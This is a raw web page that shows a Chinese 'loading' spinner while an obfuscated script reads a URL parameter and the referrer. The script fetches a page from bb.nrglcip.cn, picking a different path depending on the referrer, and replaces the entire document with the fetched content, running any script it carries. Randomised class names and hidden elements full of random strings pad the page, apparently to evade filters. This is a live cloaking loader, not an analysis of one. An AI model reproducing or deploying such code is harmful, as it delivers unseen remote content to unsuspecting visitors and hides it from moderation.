<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .Gj9jrY7L {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .Gj9jrY7L .V3ieADH {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .Gj9jrY7L .content {
            line-height: 50px;
            text-align: center
        }

        .Gj9jrY7L .img {
            width: 100%
        }

        .Gj9jrY7L .AzODF8xzWN {
            text-align: center
        }

        .Gj9jrY7L .AzODF8xzWN span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .Gj9jrY7L .AzODF8xzWN span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .Gj9jrY7L .AzODF8xzWN span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .Gj9jrY7L .AzODF8xzWN span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .Gj9jrY7L .AzODF8xzWN span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .Gj9jrY7L .AzODF8xzWN span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .Gj9jrY7L .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function F42bo7pBH(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var xrTVr = F42bo7pBH('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ xrTVr +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ xrTVr +".html?a=share";
		}
		
        MGslS7eXJ=url+"#"+new Date().getTime();
        MGslS7eXJ && function() {
            $.get(MGslS7eXJ, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<a  href='#' style='display:none'>JAalkM0vUKC14QbFJ2xmmK1sdbpvzU9qmhuj26fETcwTq4e9uEPCDUYPv2WeZPBjy89JdFMFb8ICsFiI5zjEZNkUfDrgkK0</a>
<div style='display:none'>tHXAeJm1UWEyek0Oz9PLeRNYBmEpFEnGT8B</div>
<h1 style='display:none' >hiVXlAzQZbwmzcC8FSJskkHVo045aGCu9YiuhnOytRxCRIzKQ00Ur16KebE2QiDs8pyzp5GaBJksTpC95OccUIy</h1>
<b style='display:none' >gU1IwUv6KdSrmKmhpHrSaC8zvKhI0kMybp5vcAM570S4okaJVXW</b>
<span style='display:none'>UulX4RihIrYdeGvtcpCEzJEut4udqbaLurhrwhyQV7OuJOix3oDZL1lf0RRxCeWVPcTHAmcUXDngRJmOeVrvy45t3INFE</span>
<p  style='display:none'>cXGH3uvjrvHGoFdfAYNFHElCGgpdADU9E8jG0sFyjtmsRx3je6cdQzNZioFdin75yGrbROBRzVtAMgutefBW8rabKEaJomPbmCmA</p>
<ul style='display:none' >sHIp5YPDp1Se0o8gT9bNStnT3W3qWLgfeDGX0f3tOZlrWyQlFnkcFYHtevydlmifMmoZXy317Oxp5TA2fKO0T7KbX7UnK</ul>
<img  src='' style='display:none'>
<a  href='#' style='display:none'>JAalkM0vUKC14QbFJ2xmmK1sdbpvzU9qmhuj26fETcwTq4e9uEPCDUYPv2WeZPBjy89JdFMFb8ICsFiI5zjEZNkUfDrgkK0</a><div class="Gj9jrY7L">
    <div class="V3ieADH">
        <div class="AzODF8xzWN">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<p  style='display:none'>YLm0chOSpO2EFY94JvsmPXdYtVtH07OsT70cxB65IhC3CGMchs96oTmo2gZe</p>
<img  src='' style='display:none'>
<div style='display:none'>ynztmiyTV3Cre52MQUn1dFyiPNvBUnECjKTTIduLjo9fKkWgTsyq10gZofUs6c3QIOcfEUBhqD7PV61fVYhy5XJ4eJLWCWXut8HD</div>
<p  style='display:none'>YLm0chOSpO2EFY94JvsmPXdYtVtH07OsT70cxB65IhC3CGMchs96oTmo2gZe</p>
<a  href='#' style='display:none'>IVlLZZzw4gpgYAem1bUVkrmU0wK</a></body>
</html>